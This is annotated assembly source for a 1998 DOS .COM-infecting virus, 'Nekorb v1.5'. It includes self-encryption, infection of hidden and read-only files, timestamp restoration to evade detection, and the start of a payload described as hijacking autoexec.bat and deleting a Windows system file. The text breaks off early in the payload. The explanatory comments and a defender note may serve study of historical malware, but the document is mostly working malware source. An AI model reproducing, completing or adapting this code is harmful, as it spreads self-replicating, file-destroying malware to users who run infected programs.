; ------------------------------------------------------------------------- ;
; Nekorb v1.5 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 10/06/98 | Finished: 11/06/98 ;
; `-------------------^------------------- ;
; v1.0 - start with a simple *.com appender | Size: 824 ;
; v1.1 - time / date restoration `---------- ;
; v1.2 - add XOR,NEG,NOT,ROR encryption and directory changing ;
; v1.3 - infects files with any attributes (readonly/hidden/sys) ;
; v1.4 - saves / restores file attributes now ;
; v1.5 - the craziest payload I have ever done... how to explain this...! ;
; - 1: infects all the .coms it can, and then jumps to c:\ ;
; - 2: finds the autoexec.bat file, if there is none, one is created ;
; - 3: infects either the old, or the new, autoexec.bat file replacing ;
; - the first line of it, so it executes a .com every time the ;
; - computer is started up! read only and hides the autoexec.bat ;
; - 4: creates the new .com that the autoexec.bat runs on startup ;
; - 5: that new .com jumps to the \windows\system directory, and ;
; - deletes one file, prints a message, and waits for the infected ;
; - user to press any key (just to make sure they see us) ;
; - the new .com is made read only / hidden as well ;
; ------------------------------------------------------------------------- ;
; ----------------------> For Christine Moore <---------------------------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm nekorb.asm ;
; to link :::::] tlink /t nekorb.obj ;
; ------------------------------------------------------------------------- ;
code segment ; single 16-bit segment; code and data share it (DS = CS below)
assume cs:code,ds:code ; tell TASM that CS and DS both address this segment
org 100h ; .COM image: DOS loads it at offset 100h after the PSP and enters at 100h
; Entry stub. In generation zero the first three bytes are this placeholder
; near JMP; in an infected host the same three bytes are the patched jump
; written by `infect` (see `newjump`), which lands on `start` near the end
; of the file. Everything is addressed as [bp+label] because the virus runs
; at a different offset in every host.
blank: db 0e9h,0,0 ; near JMP opcode + 16-bit displacement placeholder
start: call delta ; push the run-time address of `delta`
delta: pop bp ; bp = run-time address of `delta`
sub bp,offset delta ; bp = delta offset: run-time minus assembled address (0 in generation zero)
encst: jmp not1st ; generation-zero path skips decryption; the author's note says this jump is overwritten in copies, but the code doing so (and `not1st`) is outside this excerpt
lea si,[bp+encd] ; si = start of the encrypted region
mov di,si ; di = same address: decrypt in place
call encr ; cx (byte count for `loop` in `encr`) is expected to already hold the length here
jmp encd ; enter the now-decrypted body
;-----------------------------------------------------------------------
; encr: byte-wise transform of cx bytes from ds:si to es:di.
; In:    si = source, di = destination, cx = byte count (>0; `loop` on 0
;        would wrap through 65536 iterations), [bp+key] = 8-bit key
; Out:   si, di advanced by cx; cx = 0
; Clobb: al, flags
; Self-inverse: NOT / ROR 4 / NEG are applied before the XOR and undone in
; reverse order after it (ROR 4 twice is the identity on 8 bits; NOT and
; NEG are their own inverses), so the effective transform is a key-XOR
; conjugated by those three steps and the same routine both encrypts and
; decrypts.
;-----------------------------------------------------------------------
encr: lodsb ; al = [si++]
not al ; forward step 1
ror al,4 ; forward step 2 (swap nibbles)
neg al ; forward step 3
xor al,byte ptr [bp+key] ; XOR with the per-infection key
neg al ; undo step 3
ror al,4 ; undo step 2
not al ; undo step 1
stosb ; [di++] = al
loop encr ; repeat for cx bytes
ret
key db 0 ; key byte, stored inside the code stream; rewritten per infection from port 40h (see `infect`)
; Start of the region that is stored encrypted in infected copies
; (everything from here to `finish` is passed through `encr` before being
; written out). Restores the host's entry bytes and relocates the DTA.
encd: lea si,[bp+buffer] ; si = the host's original first three bytes, saved at infection time
mov di,100h ; di = host entry point
push di ; 100h stays on the stack for the `retn` at `exit`
movsw ; restore bytes 0-1
movsb ; restore byte 2
lea dx,[bp+offset dta] ; dx = virus-private DTA (declared outside this excerpt)
mov ah,1ah ; DOS: set DTA address
int 21h ; find-first/find-next results now land in [bp+dta]
; Directory walk: search the current directory with find-first/find-next,
; then change to ".." and repeat until chdir fails, then run the payload.
first: mov ah,4eh ; DOS: find first matching file
lea dx,[bp+comfile] ; dx = file-name pattern (string itself is outside this excerpt)
mov cx,7 ; attribute mask 7 = read-only | hidden | system, so such files are matched as well
next: int 21h ; ah = 4Eh (find first) on entry, 4Fh (find next) when re-entered from `infect`
jnc infect ; CF clear = a match is in the DTA
mov ah,3bh ; DOS: change directory
lea dx,[bp+updir] ; dx = parent-directory string (label only; content not visible here)
int 21h ; one level up
jnc first ; restart the search there
jmp pload ; chdir failed (presumably the root was reached): payload
;-----------------------------------------------------------------------
; infect: append the virus to the file just found in the DTA.
; Steps: clear attributes -> open -> save timestamps -> read the first
; three bytes -> skip already-infected / too-small / too-large files ->
; write a 3-byte JMP at offset 0 -> append the plain stub, then the
; encrypted body -> restore timestamps and attributes -> close.
; `open`, `scan`, `close`, `newjump`, `buffer`, `dta` and `finish` are
; defined outside this excerpt. The stack is balanced on both the full
; path and the `shutup` early exit (saves #4/#5 are pushed before any
; branch to `shutup`).
; Defender note: because the timestamp and attributes are put back, a
; changed mtime or attribute is not a usable indicator for this family;
; the entry-point JMP to near end-of-file plus the appended body is.
;-----------------------------------------------------------------------
infect: lea dx,[bp+offset dta+1eh] ; dx = ASCIIZ file name inside the DTA (offset 1Eh)
mov ax,4300h ; DOS: get file attributes
int 21h ; cx = attributes
push cx ; save #1: original attributes
push dx ; save #2: file-name pointer
push ds ; save #3: its segment
mov ax,4301h ; DOS: set file attributes
xor cx,cx ; clear them all (read-only would block the write)
int 21h
call open ; open the file (routine not visible; handle presumably left in bx)
mov ax,5700h ; DOS: get file date/time
int 21h ; cx = time, dx = date
push dx ; save #4: date
push cx ; save #5: time
mov ah,3fh ; DOS: read from handle
lea dx,[bp+buffer] ; into buffer (restored at the host's 100h by `encd`)
mov cx,3 ; the host's first three bytes
int 21h
mov ax,word ptr [bp+dta+1ah] ; ax = file size (low word, from the DTA)
mov cx,word ptr [bp+buffer+1] ; cx = displacement of an existing JMP at offset 0 (bytes 1-2)
add cx,finish-start+3 ; + virus length + 3: the size an already-infected file would have
cmp ax,cx ; reinfection marker check
jz shutup ; already infected: skip
cmp ax,1000 ; minimum host size (decimal)
jb shutup ; too small (unsigned compare, correct for a size)
cmp ax,62000 ; maximum host size (decimal); presumably keeps the .COM under 64K after appending
ja shutup ; too big
sub ax,3 ; JMP displacement = size - 3 (relative to the end of the 3-byte JMP)
mov word ptr [bp+newjump+1],ax ; patch it into the new entry jump (0E9h xx xx)
mov al,00h ; origin = start of file
call scan ; seek (routine not visible; presumably AH=42h with al as origin)
mov ah,40h ; DOS: write to handle
lea dx,[bp+newjump] ; the patched JMP
mov cx,3
int 21h ; overwrite the host's first three bytes
mov al,02h ; origin = end of file
call scan ; seek to end
in al,40h ; PIT channel 0 counter byte used as a pseudo-random value
mov byte ptr [bp+key],al ; key for this copy; `key` lies inside [start,encd) so it goes out with the plain stub
mov ah,40h ; DOS: write to handle
lea dx,[bp+start] ; from the virus entry
mov cx,encd-start ; the decryptor stub, written as plain text
int 21h
lea di,[bp+finish] ; scratch memory past the end of the virus: the encrypted copy is built here
push di ; save #6: destination buffer
lea si,[bp+encd] ; source = the region to be encrypted
mov cx,finish-encd ; its length
push cx ; save #7: length
call encr ; encrypt [encd..finish) into [finish..finish+len)
mov ah,40h ; DOS: write to handle
pop cx ; #7: length
pop dx ; #6: buffer
int 21h ; append the encrypted body
shutup: mov ax,5701h ; DOS: set file date/time
pop cx ; #5: time
pop dx ; #4: date
int 21h ; original timestamp back
mov ax,4301h ; DOS: set file attributes
pop ds ; #3
pop dx ; #2: file name
pop cx ; #1: original attributes
int 21h
call close ; close the handle (routine not visible)
mov ah,4fh ; DOS: find next
jmp next ; continue the search
; Host hand-off: put the DTA back at the PSP default (80h) and return to the
; host's restored entry point. Nothing in this excerpt jumps here; the
; caller is presumably in the part of the file that follows `pload`.
exit: mov dx,80h ; default DTA location in the PSP
mov ah,1ah ; DOS: set DTA address
int 21h
retn ; pops the 100h pushed in `encd` (assuming the stack is balanced on the way here) and runs the restored host
; ---------------------------( The Payload )------------------------------- ;
; ------------------------------------------------------------------------- ;
pload: mov ah,0eh ; change drive
mov dl,2 ; to drive c:\
int 21h ; now in c:\
mov ah,3bh ; change directory